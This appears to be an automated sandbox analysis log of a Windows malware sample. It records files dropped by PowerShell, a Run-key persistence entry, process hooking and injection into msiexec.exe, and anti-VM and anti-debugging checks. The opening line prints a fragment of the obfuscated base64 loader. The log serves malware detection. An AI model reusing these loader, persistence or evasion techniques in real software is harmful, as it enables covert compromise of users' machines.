Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($BZpHtpWl) [System.IO.File]::WriteAllBytes($UIEJKDyL, $oSuxTDwx) $jffBIRgk = New-Item -ItemType Directory -Path $hPZFucyy try { $xkhSPQpT = Expand-Archive -Path $UIEJK
Source: NAudio.dll.0.dr | Static PE information: 0xCC972473 [Sat Oct 8 12:22:11 2078 UTC]
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Code function: 3_2_00401CB0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,OutputDebugStringA,__iob_func,fprintf, 3_2_00401CB0
Source: initial sample | Static PE information: section where entry point is pointing to: _COF2
Source: Setup.exe.0.dr | Static PE information: real checksum: 0x7592 should be: 0x73ad
Source: python27.dll.0.dr | Static PE information: section name: _COF0
Source: python27.dll.0.dr | Static PE information: section name: _COF1
Source: python27.dll.0.dr | Static PE information: section name: _COF2
Source: ffmpeg.dll.0.dr | Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr | Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr | Static PE information: section name: _RDATA
Source: Resource.ct.0.dr | Static PE information: section name: .gxfg
Source: Resource.ct.0.dr | Static PE information: section name: .retplne
Source: Resource.ct.0.dr | Static PE information: section name: .voltbl
Source: Resource.ct.0.dr | Static PE information: section name: CPADinfo
Source: Resource.ct.0.dr | Static PE information: section name: LZMADEC
Source: Resource.ct.0.dr | Static PE information: section name: _RDATA
Source: Resource.ct.0.dr | Static PE information: section name: malloc_h
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Code function: 3_2_00402F71 push ecx; ret 3_2_00402F84
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F039 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F039 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_03416F57 push cs; iretd 11_3_03416F65
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0341648D push es; iretd 11_3_03416495
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_03416498 push es; iretd 11_3_03416495
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F039 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F039 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F033 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_03422C86 push eax; retf 11_3_03422C88
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_3_0340F033 push edi; retn 0045h 11_3_0340F03C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_077E31DE push FFFFFFE8h; retf 14_2_077E31E1
Source: msvcr90.dll.0.dr | Static PE information: section name: .text entropy: 6.9217598022130655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | File created: C:\Users\user\AppData\Roaming\Driver\python27.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll
Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\eqoamnqfg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | File created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | File created: C:\Users\user\AppData\Roaming\Driver\msvcr90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx
Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\eqoamnqfg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityApp

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EQOAMNQFG
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 5A0005 value: E9 8B 2F 96 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 76F02F90 value: E9 7A D0 69 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 750005 value: E9 2B BA 77 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 76ECBA30 value: E9 DA 45 88 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 770008 value: E9 8B 8E 7A 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 76F18E90 value: E9 80 71 85 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 1FA0005 value: E9 8B 4D C5 73
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 75BF4D90 value: E9 7A B2 3A 8C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 1FB0005 value: E9 EB EB C5 73
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 75C0EBF0 value: E9 1A 14 3A 8C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 1FD0005 value: E9 8B 8A 00 73
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 74FD8A90 value: E9 7A 75 FF 8C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 1FE0005 value: E9 2B 02 02 73
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 6476 base: 75000230 value: E9 DA FD FD 8C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 5B0005 value: E9 8B 2F 95 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 76F02F90 value: E9 7A D0 6A 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 5C0005 value: E9 2B BA 90 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 76ECBA30 value: E9 DA 45 6F 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 5D0008 value: E9 8B 8E 94 76
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 76F18E90 value: E9 80 71 6B 89
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 5F0005 value: E9 8B 4D 60 75
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 75BF4D90 value: E9 7A B2 9F 8A
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 600005 value: E9 EB EB 60 75
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 75C0EBF0 value: E9 1A 14 9F 8A
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 620005 value: E9 8B 8A 9B 74
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 74FD8A90 value: E9 7A 75 64 8B
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 630005 value: E9 2B 02 9D 74
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Memory written: PID: 1020 base: 75000230 value: E9 DA FD 62 8B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5544, type: MEMORYSTR
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe System information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\msiexec.exe System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C3CEE48
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6B7275DE
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C3CEF32
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C0503B3
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6B6B386B
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C373217
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6B6BC18C
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C1693AA
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C18D830
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C36C56F
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6AB47C44
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6AB47945
              Source: C:\Windows\SysWOW64\more.com API/Special instruction interceptor: Address: 6AB43B54
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C3CDC0A
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C01A0FC
              Source: C:\Windows\SysWOW64\msiexec.exe API/Special instruction interceptor: Address: 4CBC87
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6BF04BA0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C164B36
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C32F4AB
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C00D365
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C3E4FEA
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6BF0522F
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6C054EC0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API/Special instruction interceptor: Address: 6A6C7C44
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Special instruction interceptor: First address: 6C05B98B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5441
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4260
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2746
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Driver\python27.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll
              Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eqoamnqfg
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Driver\msvcr90.dll
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe API coverage: 7.1 %
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe API coverage: 5.7 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4916 Thread sleep time: -240000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1608 Thread sleep count: 2746 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6496 Thread sleep count: 275 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A31F90 FindFirstFileExW,6_2_00007FF764A31F90
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A17A9C FindFirstFileA,FindNextFileA,FindClose,6_2_00007FF764A17A9C
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506746140.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWyU
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
              Source: msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHh;
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
              Source: msiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506746140.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
              Source: Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
              Source: Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .vmware"m
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Code function: 3_2_004030A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_004030A8
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Code function: 3_2_00401CB0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,OutputDebugStringA,__iob_func,fprintf,3_2_00401CB0
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Code function: 3_2_004022C0 free,free,VirtualFree,free,GetProcessHeap,HeapFree,3_2_004022C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Code function: 3_2_00402CAD SetUnhandledExceptionFilter,3_2_00402CAD
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A1AFE4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF764A1AFE4
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A1B1C8 SetUnhandledExceptionFilter,6_2_00007FF764A1B1C8
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A1A92C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF764A1A92C
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A2B26C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF764A2B26C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe NtSetInformationThread: Direct from: 0x6ACC2FA8
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe NtQuerySystemInformation: Direct from: 0x6AB12CCC
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe NtProtectVirtualMemory: Direct from: 0x6C0145DB
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe NtProtectVirtualMemory: Direct from: 0x6AB12CC9
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
              Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read write
              Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4C9330
              Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2FB5008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Process created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
              Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe Code function: 6_2_00007FF764A38320 cpuid 6_2_00007FF764A38320
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
